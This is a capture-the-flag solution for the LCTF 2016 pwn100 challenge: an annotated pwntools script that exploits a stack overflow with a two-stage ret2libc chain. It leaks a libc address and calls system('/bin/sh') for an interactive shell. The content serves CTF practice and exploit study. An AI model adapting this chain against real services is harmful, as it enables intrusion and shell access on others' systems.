LCTF-2016-PWN100
栈溢出。可以通过libcdb.com获取libc.so.6和对应的libc关键函数偏移。或者使用libc-database。
#!/usr/bin/env python
# Exploit script for LCTF 2016 pwn100: a stack overflow driven as a
# two-stage ret2libc (stage 1 leaks a libc address, stage 2 calls system).
# Written against the Python 2 pwntools API (``print`` statements, str
# payloads concatenated with p64()).
#
# Defender's reading: every in-binary address below (gadget, PLT, GOT,
# re-entry point) is hard-coded in the 0x400000 range, so the chain
# presumably relies on a non-PIE build; libc ASLR is handled by the
# leak-and-rebase step in pwn().  No canary handling appears anywhere.
from pwn import *

# DEBUG = 1: run the local binary with gdb attached and verbose logging.
# Any other value: talk to the remote service instead.  As shipped, only
# the local branch is ever taken.
DEBUG = 1
if DEBUG:
    context.log_level = 'debug'
    p = process('./pwn1003s4de5rf76tg87yhu')
    gdb.attach(p)
else:
    p = remote('119.28.63.211','2332')

# Offsets inside the matching libc build (obtained as described in the note
# above this script).  Only offset_read, offset_system and
# offset_str_bin_sh are used by pwn(); the other three are unused here.
offset___libc_start_main_ret = 0x21f45
offset_system = 0x0000000000046590
offset_dup2 = 0x00000000000ebe90
offset_read = 0x00000000000eb6a0
offset_write = 0x00000000000eb700
offset_str_bin_sh = 0x17c8c3

# Fixed addresses in the target binary: a gadget used to load the first
# call argument (named as `pop rdi; ret`), puts@plt and read@got.
pop_rdi = 0x400763
plt_puts = 0x400500
got_read = 0x601028


def pwn():
    """Run both exploit stages over the module-level connection ``p``.

    Stage 1 overflows the buffer with 72 bytes of padding, calls
    puts(read@got) to print read's address in libc, then returns to
    0x40068E (presumably re-entering the vulnerable routine -- confirm
    against the binary).  Stage 2 rebases system and the "/bin/sh"
    string from that leak and calls system("/bin/sh").

    Returns nothing; the function ends in ``p.interactive()``.
    """
    # Stage 1: pop_rdi loads got_read as the argument, puts@plt prints it,
    # and 0x40068E is the return address taken after puts.
    payload = 'a'*72 + p64(pop_rdi)+p64(got_read)+p64(plt_puts)+p64(0x40068E)
    # Padded to 200 bytes -- presumably the length the target reads; verify.
    payload = payload.ljust(200)
    p.sendline(payload)
    # Discard 5 bytes of program output preceding the leaked pointer
    # -- TODO confirm this matches the binary's prompt.
    p.recv(5)
    # Take 6 bytes of the printed pointer and zero-pad to a full qword.
    addr_read = u64(p.recvn(6).ljust(8,'\x00'))
    print 'read: '+hex(addr_read)
    # Rebase: leaked read address minus read's offset gives the libc base.
    addr_libc = addr_read - offset_read
    addr_system = addr_libc + offset_system
    addr_binsh = addr_libc + offset_str_bin_sh
    print 'libc: ' + hex(addr_libc)
    print 'system: ' + hex(addr_system)
    print 'binsh: ' + hex(addr_binsh)
    # Stage 2: system("/bin/sh").  Padding is 71 bytes here versus 72 in
    # stage 1; the page does not explain the difference -- confirm.
    # 0xdeadbeef is a throwaway return address after system().
    payload2 = 'b'*71 + p64(pop_rdi) + p64(addr_binsh) + p64(addr_system) + p64(0xdeadbeef)
    payload2 = payload2.ljust(200)
    p.sendline(payload2)
    p.interactive()


if __name__ == '__main__':
    pwn()